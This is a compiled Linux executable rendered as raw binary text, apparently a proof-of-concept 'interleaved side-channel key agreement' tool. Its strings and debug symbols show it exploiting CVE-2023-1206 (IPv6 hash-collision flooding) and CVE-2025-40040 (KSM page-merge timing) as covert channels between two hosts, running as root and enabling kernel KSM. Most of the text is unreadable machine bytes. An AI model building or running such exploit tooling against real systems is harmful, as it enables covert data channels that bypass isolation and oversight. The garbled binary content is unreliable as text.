POC / interleaved_key
ELF>�@��@8
@('@@@������000�L�\�\���L�\�\��88800hhhDDS�td88800P�td ; ; ;��Q�tdR�td�L�\�\pp/lib64/ld-linux-x86-64.so.2 GNU���GNU�l�~�r`���#�g��GNU'�')*4Btu�e�m9�����b�� �&F��	�� <!��j7q]4v�-� Q�D|�!�\�"�@`� `setsockoptputsperrorclock_gettime__stack_chk_fail__printf_chkfreeaddrinfogetaddrinfobindputcharmunmappollfopensocketusleepsend__isoc23_strtolgetpidrecvoptarg__libc_start_mainstderrin6addr_anysendtolistengetoptsrand__cxa_finalizeacceptfclosesignalconnect__snprintf_chkfwritemadviseinet_ptonmmaplibc.so.6GLIBC_2.38GLIBC_2.4GLIBC_2.17GLIBC_2.34GLIBC_2.2.5GLIBC_2.3.4_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTableK���Uii
`���j���uui	�ti	��\p�\0``�_�_�_�_"�_(�\' `*@`)�^�^�^�^�^�^�^	�^
�^__
__ _(_0_8_@_H_P_X_`_h_p_x_�_�_�_�_ �_!�_#�_$�_%�_&��H��H��OH��t��H����5�N�%�N@��h���f���h����f���h����f���h���f���h���f���h���f���h���f���h�r���f���h�b���f���h	�R���f���h
�B���f���h�2���f���h�"���f���h
����f���h����f���h��f���h���f���h����f���h����f���h���f���h���f���h���f���h���f���h�r���f���h�b���f���h�R���f���h�B���f���h�2���f���h�"���f���h����f���h����f���h��f���h ���f���h!����f����%�MfD���%NLfD���%FLfD���%>LfD���%6LfD���%.LfD���%&LfD���%LfD���%LfD���%LfD���%LfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%~KfD���%vKfD���%nKfD���%fKfD���%^KfD���%VKfD���%NKfD���%FKfDH�=9$�d������H�=,$�P������\
���AWE1�AVA�:4AUL�-%ATL�%�%U��SH��H��dH�%(H��$�1��D$�D$�D$L��H�މ�����������b��wIc�L�>��@H�;�1�H��$�dH+%(�)H�Ĩ[]A\A]A^A_�DH�=�J�
1����A����L�=�J�p���@H�=yJ�
1�����D$�P����D$�C����D$�6���M��u�|$uH�;����N���H�5��H�l$P�6���1��O���H�����1�H�\$���	���H�=J�]���H�=��Q���H�=��E���H�=~�9���1�� H����H���@�����|$�1�D��L�=J#�D$d�x�D$`���4L��H�������C�;4�?�D$D�����T$�t$H�������YH�=$ H�� ���H�=#���H�������$�H�5#1���z�����$�H�5#1���`���H�5"#�1��M����D$�H�|$h������H�������|$`����|$D��yM�|$��y>H������D��L��H�5�1���D$d���D��L���+�����Q�����J����H�
aH��H�=��;�����H�
?H��H�=���������H�
H��H�=�!������H�
�G��H�=�!�������H�
�G�$�H�=p����K����Y���f���1�I��^H��H���PTE1�1�H�=����G�f.�H�=QGH�JGH9�tH��FH��t	�����H�=!GH�5GH)�H��H��?H��H�H�tH��FH��t��fD�����=
Gu+UH�=�FH��tH�=�F����d�����F]������w��������F��AUf�1�ATUH���SH��H��XdH�%(H�D$H1��G0GG �
������xj�C
4;L�cH��
L���T�������I���@1�L��I��@L�s�5���L��L��
���������;����1Ҿ�������������C 4;�H�S$H�������C0H�=����1�H�T$HdH+%(u:H��X[]A\A]�f��C0H�=J�������C0H�=��������ff.����?��y�D����ff.���AWAVAUATU��SH��H��hfo�fo=�L�|$fo5�fo-�H�T$Pfo%�fo�dH�%(H�D$X1�L��fDo�H��f��fEo�fAo�fAo�fD��fAa�fAi�fDo�fa�fDi�fAo�fD��f��fAa�fDo�fAa�f��fEi�fDo�fEi�fAa�fAa�f��fg�fo�f��f��f��f��)H�H9��d���I��I��S㥛� L��i�����Hi$ʚ;HT$H��H��Hc�I��H��I��H�@L���K���Hi$ʚ;HT$H��H��I��H��H9�sK�C0�;��t"A�L�C�@L���@�f����@A�L�C �@L���@�D����f�L������Hi$ʚ;HT$H��H��I��H��H��L)�H�T$XdH+%(uH��h[]A\A]A^A_����ff.���AWE1�AVE1�AUE1�ATUH��S㥛� S��i��H��H�|$L�d$ Hc�L��dH�%(H��$81��|$��D$����HiT$ ʚ;HT$(H��H��H��H��H���H�|$��������pL�����HiT$ ʚ;HT$(H��H��H��H��H9�r�1�A��	~Ei��M)�Ic�L1�H��$8dH+%(ukH��H[]A\A]A^A_�D�|$�H�t$0�@��L���C�HiT$ ʚ;HT$(H��H��H��H��M��LD�I��A���<����?�ff.�@��SE1�H��A������"��1���H�H��������H�Ǻ�����xH�C1�[�f.�H�=I�t���f���SH��H�?H�G�H���v[�f���
��H�;�[�3���UH�-`H�=%SH��H���`�H��t$H��H����H�=2��H���'�H��H�=�(�H��H��t3H����H�=�W�H�����H��H�=[]��X[]�f�����fo�fDo
���fo=�fDo�fn�H�fo5�f`�fo-�fa�H��fp�f�fo�H��fA��fDo�fo�fo�fE��fAa�fAi�fDo�fa�fDi�fo�f��f��fAa�fDo�fa�f��fDi�fo�fAi�fAa�fa�f��fg�f��@�H9��{����f.���H�7E1�L���1�����Ј��1H�� ��H�� H��H	�H	�H)�I�L9�u�L��H���ff.����AUE1�ATI�UH��S1�H��H�MA��A��I��H�yH��H�H���H)������H�����H���=���H�A���u�H���������H�5*�H��1�H��H�U��H�EH��[]A\A]�f.���H��(dH�%(H�D$1�1�@�t$H��T$�H�L$1�f�D$�$�L�D$��H��������H�T$dH+%(uH��(��r�f���UH���S��H��dH�%(H�D$1��<$H���D$�	��~E1ɺH�����H��u.1��}�����H�T$dH+%(uH��[]�f�����������@��AWA��AVAUATA��USH��H��HD�KT�PdH�%(H�D$81�E����1�L�l$ f�1ɺf�t$&L��D$(�D$ ��D$$D�d$%�������H������{PE1�1ɺL���D$$H��fD�D$&�D$ �D�d$%H�D$(H�D$0�:��{PH������L�t$I��M1�M��I��A��L9K8s�CxE����H�D$8dH+%(��H��HD��[]A\A]A^A_�I���L���8����{4�P����{PL���H������1ɋ{PH�t$ f�L$&�1�L�t$�D$ ��D$$D�d$%H�l$(H�D$0�h��>���H��D��M��H��AUH�5
�1����XZ�6�����f���AWAVAUATA��U��SH��H��Hfo�fDo
�dH�%(H�D$81���fDo�fo=���fo5�fo-�fn�H�G@f`�fa�H��fp�f�fo�H��fA��fDo�fo�fo�fE��fAa�fAi�fDo�fa�fDi�fo�f��f��fAa�fDo�fa�f��fDi�fo�fAi�fAa�fa�f��fg�f��@�H9��{���D�ST�{PE���lL�t$ E1�f�1ɺL���D$$I��fD�L$&�D$ �@�l$%D$(����{P��L���@����P���H�{@����{TI�Ņ��{P��1��1��D$$f�t$&L���D$ �@�l$%H�D$(H�D$0�v��{P��L������L�D$L�KHM9�L��K�	IC�E1�H9�L��A��L1���A1�I���L9�s�C|E����H�D$8dH+%(��H��HD��[]A\A]A^A_�L�����]���1ɋ{P�f�L$&L��1��D$ ��D$$@�l$%L�l$(H�D$0���I���I���L�t$ L���
����{PE1�f�1ɺL��fD�D$&�D$ ��D$$@�l$%D$(�d����H����L��AVH�5@	1����XZ������D��AV1�L�59
AUA��ATA�ԉ�H�5>	UH���S1���H�=f	��H�=�	�u�H�=�	�i�H�E8'H�=��U�H�}@����D��1�H�5�	�F�E��E�@�����t�؉ٺ����H���TX���؃�D	�t3� N��A9�tO�f7��tED���H���t������fDD�M|D�Ex�1�D���L����� N�b�A9�u�[1�]A\A]A^�f���U1҉��S�
H��HdH�%(H�D$81��C���������A�H�L$�D$�E���f�
f��H�t$��o
$3f�|$��H�D$$D$f�D$L$� ���x>H�D$8dH+%(u7H��H��[]�1Ҿ����Å��\���������‰��7��������Uf�A��S�H���L�H��hdH�%(H�D$X1�H�l$@)D$H���D$)D$ )D$0��H�L$H��H��H�T$�������H�D$1ҋp�x����Å�x^����A�H�L$�D$��H�D$�ߋPH�p�f���x4H�|$��H�D$XdH+%(u-H��h��[]�H�|$�u�������։��'�H�|$�]������fD��AT1ҾU���
SH��@dH�%(H�D$81��1�����L�d$��ljþA�L���D$�0��
f��f�D$�o
1��H�t$f���D$H�D$$f�D$L$�������������H�5~1�����1�1����'��߉��.���x.��A�L����D$��H�=
�l�H�D$8dH+%(uH��@��[]A\�������������ff.���AT1�UHc�H�5�SH�������~&H�L�%���L��1�H����H9�u�[�
]A\������SH��H�=���H�=e��H�=���H�=���H�ڿ1�H�5P��H�=Z�v�H�=w�j�H�=��^��:4H�5�1���V��H�5�1���>�H�=�"�H�=��H�=*�
�H�ڿ1�H�5��H�ڿ1�H�5����H�=���H�=����H�=�[����H��H���[Net] Using IPv6 for CVE-2023-1206[Net] Using IPv4 (CVE-2023-1206 less effective)[KSM] MADV_MERGEABLE failed (KSM may not be enabled)/sys/kernel/mm/ksm/sleep_millisecs[R%03d NET] our=%lu peer=%lu combined=%lu -> bit=%d
[R%03d KSM] our=%lu peer=%lu (base=%lu) -> bit=%d

[Protocol] Starting interleaved key agreement (%d bits)
[Protocol] Even rounds: CVE-2023-1206 (Network)[Protocol] Odd rounds:  CVE-2025-40040 (KSM)
[Calibrate] Network baseline...
[Running] Starting %d rounds...

[Progress] %d/%d bits (net_entropy=%d, ksm_entropy=%d)
[Server] Listening on port %d...
╔════════════════════════════════════════════════════════════════╗║  Interleaved Side-Channel Key Agreement                        ║║  CVE-2023-1206 (Network) + CVE-2025-40040 (KSM)                ║╚════════════════════════════════════════════════════════════════╝
  -c HOST    Connect to HOST (initiator)  -l         Listen for connection (responder)  -p PORT    Control port (default: %d)
  -b BITS    Key bits (default: %d)
  Host B: sudo %s -c <host_a_ip> -v
  Even rounds: CVE-2023-1206 (IPv6 hash collision timing)  Odd rounds:  CVE-2025-40040 (KSM page merge timing)║  Interleaved Key Agreement                                     ║║  Even: CVE-2023-1206 | Odd: CVE-2025-40040                     ║[Client] Connecting to %s:%d...
Failed to establish connection
Failed to init network context
Failed to setup flood listen socket

════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════::ffff:%s[Net] Using IPv4-mapped IPv6socketmmapw10
/sys/kernel/mm/ksm/run1
[KSM] Enabled[KSM] Baseline: %lu cycles
[Calibrate] KSM baseline...%d[Server] Peer connected!Key: %02xUsage: %s [options]

Options:  -v         Verbose output  -h         Show help
Example:  Host A: sudo %s -l -v

Protocol:peerc:lp:b:vhFailed to init KSM context
Key agreement failed
KEY AGREEMENT COMPLETE  Network entropy bits: %d
  KSM entropy bits:     %d
  4��$��������������������������]����������������������������P����������;��� 0��H@��``���t�������p��`��xp������������H�����@���� ��40�H���P�������(�����������@�P��|zRx�`��&D$4���0FJw�?9*3$"\���t��� ����8����RF�H�A �I(�G��
(A ABBC�������������L���F�B�B �B(�A0�C8�G��
8A0A(B BBBAH\���qF�E�E �E(�A0�K8�O��
8A0A(B BBBF���nE�P
K������,�=E�Q
JX0L��E�O�G j
HAEAAA4���H��T4\���F�E�K �D(�F0(A ABB�X�nH0`
A(����E�I�F0`
AAJ\���F�E�B �B(�D0�A8�G��
8D0A(B BBBD|�K�T�A�\<���F�B�B �B(�D0�C8�G�
8D0A(B BBBA��L�O�A�8� �.F�K�E �M(�I0��(C BBB(���E�J�I`�
CAD(��E�M�X��
CAA00��BF�H�H �D`
 CABA(d��YF�C�K �xFB��E�
H�����F�E�H �I(�H0�C8�J�
8A0A(B BBBFp0K
�-�\�\���o���
��^0��
	���o���o(
���o�o�	���o�\0@P`p�������� 0@P`p�������� 0@`GCC: (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0L�W�(���JM�/�	"	�*�ND�
�
	5		&Kx	,	(ROintD	�
	*=
	�	-*	Y	��	n	��	�	�	�
	��	e		�=	�	�			��	�	�!�'

�
'	�
	�= �	�
1�c
3^
6	
<
7	
1
8	
�
9	
 �

:	
(�
;	
0�
<	
8u
=	
@A
@	
HR
A	
Pa
B	
XV
D�`�
F�h�
Hp
It�	
J�x0
MR��
NY�'
O���	
Q���	
Y
���	
[���
\��
]��
^	D�I
_
1��
`�x
b�	�	1P>
+9F�1�*�9�	�9��* 	!	N��):[�)	�
�	
� ��	�����Q	7	`'�D�	.s	�
�	��-�
%
�:�$
	CH�RS2=X%�
��
��
%r	�	�R ���n�X��
��*
E=�B���
�b �@Y�*
QM�	� {@�	�%
%	%�%� %�@d )	��!�XO��D���lF<�bX�	�
�|A��		P
�GO	�	T
�GS	�� E�!�E=)�j�@%�����	I!�)./�2X3L	\^f
b�gY
l�
s?	�
���I�b��
	v}�T�;��
;[�!;��1�!*�1*�A* }�[<�	�'A:)�[K|*F'05�)7n8�
9{
:�;
�<B1=	
 �>�('||�	�!* 5$MUfd&	['lZ(l<�p�	`V4�	���	���G ��	0	�	�b=�jD	�-p
�=p;	�	q��	r�s�dt��u�#v�-%w�=���	>net��?�	4��8>ksm��@��	PQ�	T>key�
�	XM�	x��	|��	*-��H	(����
�?�?
=Wx��LRB
B
R�X�b
�+[�
�
�2�
��
��
�(�
�~�
��?#��V�&	+�&�pP��1{��g���1����1�.)���)�)
2L%D1�^ED1P9DtD1��D11(�
�D11(a�D1�

*(��H

*(��l

�!�
F�
^c��
�1��o4�
)?n�
�f�:!F?fA�����)�����i[��
����	����	��k�	
f�	,*opt�	@:ctx��	��~GApp�V!YA��	T0Q:GA����!YA��	T0Q:�@W���A_]�@pn�@�~gA''�(vA��3�CU	x2gA33�vvA��?�CU	�5gA??��vA��K�CU	86gAKK�vA��W�CU	�3gA��'TvA����CU	7gA�)�vA���CUsgA��(�vA�CU	:gA*0vA&�
U2T	1:gA&&+�vA31@�
U2T	M:gA@@,�vAKIS�
U2T	i:gAkk.vAcas�CUs�<�3Q�<yu
��
gA�	�vA����
U2T	�6QR~�A��	�A��!�A�GU	�6T1QO�A��	^�A��!�AGU	�6T1QO�A	��A��!�A9GU	�9T1QK�A>>"	�A��!�A[GU	:T1QE�A``"	v�A
!�A}GU	�6T1Q$b
�UvTsQ}
@)
�)
G
�U2T	�,
�U0


'

h84p[6.Uv�FU~��<dUsT��"}U
;4��#�UsT��~�Q��~�k��U��T��~�8
|�
��5�Uv�� UT~
��

�G.���,���	�)#gA�,���vAJH�,�CU	x2gA�,�,��vA^\�,�CU	@3gA�,�,�8vArp�,�CU	�3gA�,�,��vA���,�CU	�3gA�,�,��vA��-�
U2T	Y9QsgA--�-vA��-�CU	o9gA--�{vA��&-�CU	�4gA&-&-��vA��2-�CU	�4gA2-2-�#vA��J-�
U2T	�4Q
:4gAJ-J-�}vAb-�
U2T	(5Q
gAb-b-��vAn-�CU	x9gAn-n-�vA20z-�CU	�9gAz-z-�gvAFD�-�CU	�9gA�-�-��vAZX�-�
U2T	�9QsgA�-�-�vArp�-�
U2T	P5QsgA�-�-�gvA���-�CU	�9gA�-�-��vA���-�CU	x5*gA�-��/vA��H0�-�CU	�5.l�`,Y�key���v�(��1�,*�i���*gA�,��%vA#!�,�
U2T|gAd,���vA;9�,�
U2T	N9*gA�,��/vA��H0�,�HU:���+B�� ��[Q��	��opt�	��2�������	��*A�+p��:A��gA�+�+�vA���+�
U2T	P2QvgA,,�	jvA��$,�CU	59?+!�U:T1Q0p+P�UsT1Q2R|X4�+0�UsT��QL�+�
�UsT1�+�
 UsT0Q0�+�
3 Us,P` UvT6Q1R|X4F,�
x Us
R,G�{�)�q"�{!�{++%2�}|��res~���2�
q"�@��	RHopt�	���A?*Q��!�Axv�A���A��N*"IUvT@Q2R@X	29Y�Tc*�!UsTvQ��R��}*!�!Q0�*P"UsT6Q1R��X4�*�
$"Us
�*�

�*�
�*�
V"Us
+�

+G�"*2d)���#�d���f	��optj	��2�m���*A�)>o#:A-)!3#U:T2Q0[)Pa#UsT1Q2R��X4�)0�#UsT��QL�)!�#U2T2Q0�)�
�#Us
�)G�1�'.�d'ctx1(d'-k11phf1?��1Z(�p%@���
A
($�L
F<9M
�z�?�(.X	�$�?���(��$U
 N�(�U
 NgA�(�(T
A%vA���(�
U2T~QsR}
m(,�(i'UvTsQ|gA�'3�%vA��(�
U2T	01Q}gA((4&vA		(�CU	p1gA((5Y&vA		(�CU	�1gA((8�&vA,	*	'(�CU	�1gA/(/(;�&vA@	>	;(�CU	9gAD(D(>N'vAT	R	Z(�
U2T	�1Q}D(�1Uv��	��$��,ctx�-d'r	j	�6�	�	f�E�	�	msg�;	����


��B
>
M�`
X
�
	�
�
�3%���(4�
�
�3
�44=9H&4"%�'4`^%1�%��	&)k1pn^1pnQ1�~D1��71���x1�� &{T~QHR0�?0&0&
n)�?��:&�U
P�%1T&T&6	�)k1��^1��Q1��D1��71x1���&{T~QHR0%1'�	�*k1^1%#Q142D1CA71SQ�x1��L'{T~QHR0%1i'�	+k1b`^1b`Q1rpD1�71���x1���'{T~QHR0gA�'�' '	k+vA���'�
U2T	�0QvR}0&�/�+TQ
�C&�2�+Us��&�/�+TQ
�'�/�+TQ
�f'�/,TQ
�
�'G��#���/ctx�,d'���5��f�D%

msg�;	�����^
R
����
�
M���
�
�
�	�
�
%1;#;#6�	Z-k1^1Q1'%D16471FDx1��q#{T}QHR0�?q#q#
�	�-�?US{#�U
�%1�#��	*.k1ec^1wsQ1��D1��71���x1���#{T}QHR0%1s$��	�.k1��^1��Q1��D1��71���x1���${T��QHR0gA�$�$$�	/vA�$�
U2T	�0Q|RvX~�#X:5/UsTN�#�/U/T��Q
�8$�/t/T}Q
�E$67�/TPX$�/�/T}Q
�
�$GP�p"�� 1��&msg�' 1PH�0vrpfd��PZ@�"��	�0�@��u@��i@���"H
U�PT1Q�Q�@�"�"�	1�@���@���@���@�@�"�UsTvQHR0
�"G;	Iz��1"��"�	�"�"�0�"��@�"#�Q�@msg�;	Z
�P!���2ctxZ#�2("�\�KGAT�2i^ca�@p!g`	+2Asq�@���@���?�!�!
a	s2�?���!�U
��!�2Uv*gA�!zfvA���!�
U2T	�8��G
�� T��3ctxG'�2��pI�3���L�iN4.t1O�fbt2R���@!+O�3+@��#@��*@!ARA@��#@���XH
734Yctx7"�2"7+@p934Z:<
�[@i=�.6
(`���5f*)
�A��-�4�A75�AQM�GU	�8T1Q3Rs�A��0=5�Age�A�}�GU	�8T1Q2RsgA��0,5vA��0��CU	�8���5U	�0Tv���5Us���5U	�8Tv��Us.A =�[6ctx�2��O%E6T
Q=0]
T
\���67ctx�2��gA�	�6vA�CU	`0�E�6U0T
Q3R"X	�Y0�%7T
Q<��
U	�8J��0q�H:3E� +'3�1FBKbuf�
H:��}Kpfd���}#r��b^#���{y#X	�	��#����A�|94ret�
��1HT94now����$�@HH�
�8�@���@���@
�@1/�@B@`�U��}�T��}Q
R@B�?`��+�?``�.�?��}ml
U1T|+Z@����@TRu@TRi@hb�H
U��}T1Q15�?�}��9B�?���.��?��}�l
U1T|$�?��)�::+�?���.�?��}�l
U1T|
�G�X:*�J����<Lctx�%�<��3��.��<��
�<��~#i����4end��#(�	64#n��LD1q� ;4i���5�?G�v;B�?Z�.Z�?��~0l
U1T}$�?XX(��;+�?XX�.�?��~el
U1T}5�?�m�:<+�?���.�?��~�l
U1T}��
i<TQ@R@XsYL��
�<TQ@R@Xs Y@
"G���<*?]7��<,ctx��<^����?Lctx��<��3��*!A5�><���?��$�A&�	�=�AUS�Amk�A�|+"IU}T@Q2R@X	�8Yv$gA���
�=vA����CU	0$gA���
G>vA����CU	�8�j>U:TvQ|;�>U:T}Q|
K�
5�@�"��>A���@���@��$gA���(?vA����CU	00�!I?U:T2Q0\!j?U2T2Q0~�?U2TvQs$
�G��
U	�8�?*?_���?,ms�`t��6|��@7ts�^6Uy�/@7lo{=7hi{=a5q
��Z@bsqU&�%�@�	%
�%$�%0&a"�@�
"�"D,__n"%1b".7sz$
1&�9D
At
9D�9�916�1�*Al1�6^"sGAl"sI��gA"$�&�T�A�T )&�M�A�M.�M<)&3�A,__s3,__n31�3)C�<��B�<c�
C�3 ��B/�3U/4T4"4?;H&4 �'4b`C%1"n�C71tpD1��Q1��^1��k1��x1�PH"{CU�UT�PQHR0
n"G
���╔════════════════════════════════════════════════════════════════╗
8��
J�H║  Interleaved Key Agreement                                     ║

J�H║  Even: CVE-2023-1206 | Odd: CVE-2025-40040                     ║

���╚════════════════════════════════════════════════════════════════╝


���
════════════════════════════════════════════════════════════════

���════════════════════════════════════════════════════════════════

�KEY AGREEMENT COMPLETE
8i_d��
J�H║  Interleaved Side-Channel Key Agreement                        ║

J�H║  CVE-2023-1206 (Network) + CVE-2025-40040 (KSM)                ║

�
Options:

,�*  -c HOST    Connect to HOST (initiator)

2�0  -l         Listen for connection (responder)

�  -v         Verbose output

�  -h         Show help


�
Example:

�
Protocol:

=�;  Even rounds: CVE-2023-1206 (IPv6 hash collision timing)

9�7  Odd rounds:  CVE-2025-40040 (KSM page merge timing)

�
8yo
�[Server] Peer connected!
8�
3�1[Protocol] Even rounds: CVE-2023-1206 (Network)

1�/[Protocol] Odd rounds:  CVE-2025-40040 (KSM)


#�![Calibrate] Network baseline...

�[Calibrate] KSM baseline...

�[KSM] Enabled

8�6[KSM] MADV_MERGEABLE failed (KSM may not be enabled)

&�$[Net] Using IPv6 for CVE-2023-1206

 �[Net] Using IPv4-mapped IPv6

3�1[Net] Using IPv4 (CVE-2023-1206 less effective)
I~1�BIH}H}1R�BX!YW
:;9I8(	:;9I
6!I
:;9I8
H}4:!;9I�B1R�BUX!YW.?:;9'I<:!;9I�B:;9I41UI!I/41�B($>.?:!;9'I@z:!;9I�B7I.?:;9'I<4:!;9I�B4:!;9I :;9!!1":;9I#4:!;9I�B$1R�BX!YW%(&.?:;9!'I !4'&I(.?:;9n'I<)*1R�BUX!YW+1R�BX!YW,:;9I-:;9I..?:!;9!'@z/10H}�124:!;9I3:!;9I�B44:!;9I�B51R�BUX!YW6.:;9'I !74:;9I8.?<n:!;!9<:4:;9I?<;
:!;9I<4:!;9I=:!;9!	>
:!;9I8?.?:;9!
'<@4:!;9IAUB1R�BUX!YWC.1@zD5IE>!!I:;9!F:;9!G!:!;9!	H1I.?:;9'I J.?:!;9!
'I@zK4:!;9IL:!;9I�BM%UNO$>P:;9Q&R'S>I:;9T:;9U
:;9I8V:;9W.?:;9'I<X.?:;9' Y:;9IZ4:;9I[\.?:;9'IU@z].?:;9' ^.?:;9'IU@z_.:;9' `.:;9'I a.:;9'@zb:;9IcH}�d.?<n���
Ps����	 .7?IT]fnu|�������������	%0 	��"J+38�'.
�f�J*jT���
t�
���XX/	K"	w*
J�	��
<#	�
�	�x/�v!XJ�u�
��Y(.J 
bt
u�
�
�
_
u�
�
�.X	�K.Ke�fJ
<	����'y�7�<(��fY&�7[(�t7�<��=J�'y�&�7[��	Y
=-
K"��'y�&�X�7�J��hJ J.<X	0j8	4z<377�<��/Dxft�J/�X�<<�/�JX���'yY&�7[��>	��~
X�	�J�'y�&�7[��X#.i9t9<)<=�
t��~֞
��'y�&�7[1��7�t<
�JX<K!;=fX>�	�O�/ 	��~
��JK =<Jj 	���	�K	#�	#9	MY��~
�"��	!X�~
�!�,��~�
�~J�t 
�~ X�  �K
g
t-	�k%I��K
:	�~�J�~</	�	K=�~/	��~!J.J�!�~t�ff
`u�K

�}t��Y-	O�}
��
�}J���	��~%�	��8�
�}���
�}<�.JK�}
X�Kf���{y<QyX_y.@X��
�}�X�t�
�}<<���}
X�K�}�g�J 0�x'��	Ly<�	��5yXQyt_y<_y'X	9�}%�	�	��<Cy��X	>��X	>�Xg*	tL	gM�� ....	fJ�<Z	��	>Y�	�.�<yX_�t	Y��@X�	��|
"�.Y
t
�~����~
g
t�t	�k%I��	K;	��yX{y�	�X�<{X	���}%���9?	/;	g�~5yt�y<�X	��	X*N?4e?K�?>HA
<>(t	YM�� ...	b<��~	�.�~<yX_yX�@XX	���	�X<Y�<{y��@XX	��|
��.Y�K�|�
�|.��
�|�.t�
�|JX�
�|<X��|
���|
���|
����|
����|
X�
*
�	_
H&1
q?& <&. .	N <	��|%�;�*X	��
]X
��|
�	��|%�;�*XJ..	XY-/W!WJ�Y.�	e�Z
�{�.
�{�	�Jz�	�z.�{.�^	XPtnJ/�	tu2[YI
�{<�X
�{ �X
�{<X�tJ�
�{�X
�{X<���{�
�{�X�	J�*X�L	e�Z(	X�P�s�(�@		tu�3�gs=WX�Y��	��Z	�z.�{X�
�{�	�.
�{XJ	�zXz	X���{
J��-/Z	K
I	�Y�{
��	o�usX.	.K�{�
�{.�.
�{Jt� 
�{<XX�
t%��{%�
�{<��
�{JX!�Y�{�
�{ �X
�{<��K�{� 
�{<tX��{
���{
���{
���{
X��{
���{
���{
���{
t��{
t��{
���{
���{
���{
X��{
X��{
���z
���z
�t
�z 		���	���	��g;	1c		�wt�/	��4�4�	�<4(�/�.�.�}
.<(��'t��}
.J,�	T��	���	
�sXY�X
�z.�X.Z�z
���z
���z
���z
���z
��Y	��	�/=r	K	YR�	���K�	���z
.��z
���z
���z
���z
���z
.�u�z
���JK�{JJ��	TX
�z�<	��z
X	��{�t%�	^t�z
�	�	]�z
�	�	iX�z
�	�	!X�z
�	�	zX�z
�X�__recv_aliasIPPROTO_MAXsin6_flowinfo_shortbufai_canonname_IO_lock_t__pad5recv_protostderr__flagsIPPROTO_IP_IO_buf_end__poll_aliassa_datasignalIPPROTO_MPTCPrun_interleavedsockaddrbindksm_measure_writesin6_scope_id_IO_write_endround_cve_2023_1206_freeres_listtimeout_ms__nptrgetopt__socket_typeIPPROTO_IGMPcombined_markers__builtin_fwriteksm_ctx_tsend_protoduration_msconnect_to_peer__u6_addr32__timeoutnfds_tGNU C17 13.3.0 -mtune=generic -march=x86-64 -g -O2 -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protectionmmaprdtsc__u6_addr16send__bsxfirst_packetround_numIPPROTO_ESPnet_initpeer_timingnet_flood_burstIPPROTO_EGP__lenlong long unsigned intIPPROTO_IPV6__u6_addr8MSG_ERRQUEUEdeadlinetarget4target6sin_family__uint16_tnet_cleanup__sighandler_t_IO_backup_baseMSG_TRUNCprint_keyin_port_tlsockIPPROTO_PUPpeer_ipfprintf_filenoMSG_OOB__bufsin6_portsin_zeros_addrtv_nsecusleepsa_family_tsrand_vtable_offsetai_addrMSG_TRYHARDIPPROTO_BEETPHproto_msg_t_IO_read_baseflood_listen_sockMSG_FINMSG_EOR_IO_save_endelapsedbytessin6_addrIPPROTO_TCP__uint64_t__poll_chk_warnlisten__poll_chkIPPROTO_UDPhints__fmt__isoc23_strtolacceptctrl_sock__streamnet_baselinetimespec__fprintf_chkIPPROTO_IPIPsetup_listen_socket_IO_markeris_initiator_IO_read_ptrnum_bitsget_usMSG_NOSIGNALSOCK_DCCP__builtin_putsmappedSOCK_PACKET__nfdsMSG_DONTWAITnet_measure_floodksm_init_IO_write_baseSOCK_DGRAM__pid_tlong long intperrorksm_calibratepackets_sentsig_handler_IO_save_basesin_portIPPROTO_AHsendtopage__printf_chkget_nsIPPROTO_ICMPmadviselast_packetmsleeplisten_modeinterleaved_ctx_t__syscall_slong_tmemsetksm_entropy_bitsMSG_ZEROCOPYMSG_SYN__recv_chksnprintf_freeres_bufin6addr_anypollfd__in6_usin_addrnet_entropy_bits__bswap_16start__builtin_putcharinet_ptonaccept_peerMSG_FASTOPENpollfopenargc__chIPPROTO_IDPMSG_CTRUNCMSG_CMSG_CLOEXECoptargargvprint_usagemainclock_gettimeIPPROTO_RSVPIPPROTO_GRESOCK_STREAMsetsockopt_IO_read_endIPPROTO_ETHERNETreventssin6_familyai_familyshort 
intconnect__clockid_tbyte_idxMSG_DONTROUTEport_str__stack_chk_fail__bswap_32IPPROTO_PIM_IO_wide_datapeer_hostfcloseMSG_PEEK__SOCKADDR_ARGMSG_BATCH__ssize_tsockaddr_in__uint8_tIPPROTO_SCTPIPPROTO_MTPpacket_count__useconds_tSOCK_CLOEXECIPPROTO_TPmagicmsg_typeMSG_RSTMSG_MORE__CONST_SOCKADDR_ARG_locktv_sec__fdsprognet_ctx_t_IO_codecvt_old_offset_IO_FILEIPPROTO_UDPLITESOCK_RAWMSG_WAITFORONEMSG_WAITALLksm_enable_systemksm_fill_patternIPPROTO_COMPIPPROTO_ENCAP__destai_protocolai_socktypeunsigned char__uint32_tkey_bit__socklen_t__recv_chk_warn_IO_write_ptrSOCK_SEQPACKET__fdIPPROTO_L2TP__time_tround_cve_2025_40040roundnonceai_flagsmunmapbit_posksm_cleanupMSG_CONFIRM__off_trecvverbosesa_familygetpidshort unsigned intIPPROTO_MPLSuse_ipv6ai_nextatoiour_timingSOCK_NONBLOCKtotalrunningin_addr_t_chainai_addrlen__builtin___snprintf_chk_flags2MSG_PROXYfreeaddrinfo_cur_columnsockaddr_in6IPPROTO_DCCPgetaddrinfoIPPROTO_RAW__off64_t_unused2_IO_buf_baseSOCK_RDMinterleaved_key_agreement.c/home/vlad/Desktop/convert_channel_bug_exploitation/usr/include/x86_64-linux-gnu/bits/usr/include/usr/lib/gcc/x86_64-linux-gnu/13/include/usr/include/x86_64-linux-gnu/bits/types/usr/include/netinet/usr/include/x86_64-linux-gnu/sys/usr/include/arpastring_fortified.hstdio2.hpoll2.hsocket2.hbyteswap.hstdlib.hstddef.htypes.hstruct_FILE.hstdio.hclockid_t.htime_t.hstruct_timespec.hstdint-uintn.hunistd.hgetopt_core.hsignal.hsockaddr.hsocket.hin.hnetdb.hpoll.htime.hstdio2-decl.hmman.hinet.h<built-in>socket_type.h�\U\�V���U���V���U���V���U��\T\�S���T���S���T���S���T��0���_��_��_��_�0��
:4���P�
���P�0�P��P��PW��W0�WS'�C3��C?�=DK��D��XE�!F���F
1:�&
M:�@
i:�k�!F���~�FM��~��
�6��
�6��
�6�
�9�>
:�`
�6��,U�S���U��,�C�,�G�,�cG�,��D�,
Y9�-��G-��G&-��G2-
�4�J-
(5�b-�Hn-�@Hz-�\H�-
�9��-
